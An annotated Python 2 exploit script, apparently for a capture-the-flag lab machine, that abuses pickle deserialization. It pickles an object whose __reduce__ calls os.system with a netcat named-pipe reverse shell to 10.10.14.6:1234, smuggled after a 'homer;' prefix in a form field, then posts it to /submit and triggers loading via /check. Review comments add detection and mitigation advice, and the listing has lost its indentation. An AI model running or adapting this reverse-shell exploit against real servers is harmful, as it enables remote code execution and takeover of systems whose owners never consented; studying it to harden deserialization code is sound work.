- #!/usr/bin/env python
- import requests
- from hashlib import md5
- import cPickle
- import subprocess
- import pickletools
- import os
# Proof-of-concept object showing why unpickling untrusted bytes is equivalent
# to running attacker-chosen code. Python 2 only (see the cPickle import).
# NOTE(review): the paste lost its indentation and carries "- " list markers,
# so the listing is not runnable as shown.
- class Exploit(object):
# pickle consults __reduce__ when serializing an object. The (callable, args)
# tuple it returns is stored in the stream, and the *loader* calls
# callable(*args) while reconstructing the object. Nothing about the Exploit
# class itself has to exist on the loading side.
- def __reduce__(self):
# The string is one shell command line. The part after "homer;" attaches
# /bin/sh to a netcat connection through a named pipe in /tmp.
# NOTE(review): the leading "homer" presumably satisfies a server-side
# allow-list check on the character name; the server code is not shown, confirm.
# Detection: a web-application process spawning sh, mknod or nc, creating a FIFO
# under /tmp, or opening an outbound connection is the host-side signal for this.
- comm = "homer;rm /tmp/shell; mknod /tmp/shell p; nc 10.10.14.6 1234 0</tmp/shell | /bin/sh 1>/tmp/shell"
# os.system is the callable the loader will invoke with comm as its argument.
# Mitigation belongs on the loading side: never pass request-controlled data to
# pickle/cPickle loads(). Use a data-only format such as JSON, or verify an HMAC
# over the blob with a server-held key before loading it.
- return (os.system, (comm,))
# Driver: serialize the object, submit it as form data, then request the stored
# record by id. Both 10.10.x.x hosts are RFC 1918 private addresses.
# NOTE(review): the server code is not shown. The flow implies that /submit
# stores the fields and /check deserializes them with pickle; confirm on the server.
# cPickle.dumps() is called without a protocol argument, so Python 2 uses the
# text protocol 0 and the command string appears verbatim in the request body.
# That makes pickle opcodes in a form field a usable inspection or logging signal.
- payload = cPickle.dumps( Exploit())
# The serialized object is sent in the 'character' field; 'quote' is one space.
- r = requests.post("http://10.10.10.70/submit",data={'character': payload,'quote': " "})
# The script treats the literal "Success!" in the response as acceptance.
- if "Success!" in r.text:
- print "Successfully submitted quote."
- else:
- print "Something fucked up submitting quote"
# The record id is recomputed client-side as md5(character + quote).
# NOTE(review): this presumably mirrors how the server names stored submissions.
# An id derived only from user-supplied content is predictable by the submitter.
- p_id = md5(payload + " ").hexdigest()
- print "md5 of payload+space: "+p_id
- print "Attempting to Exploit!"
# Requesting the id is the step expected to make the server load the stored data.
# Defender takeaway: validation at /submit does not help if /check later unpickles
# the stored bytes. Remove the unpickle, or authenticate the blob before loading.
- r = requests.post("http://10.10.10.70/check",data={'id': p_id})
# Both branches print the response body; only the "Decoded file:" banner differs.
- if "reviewing" in r.text:
- print "Decoded file:"
- print r.text
- else:
- print r.text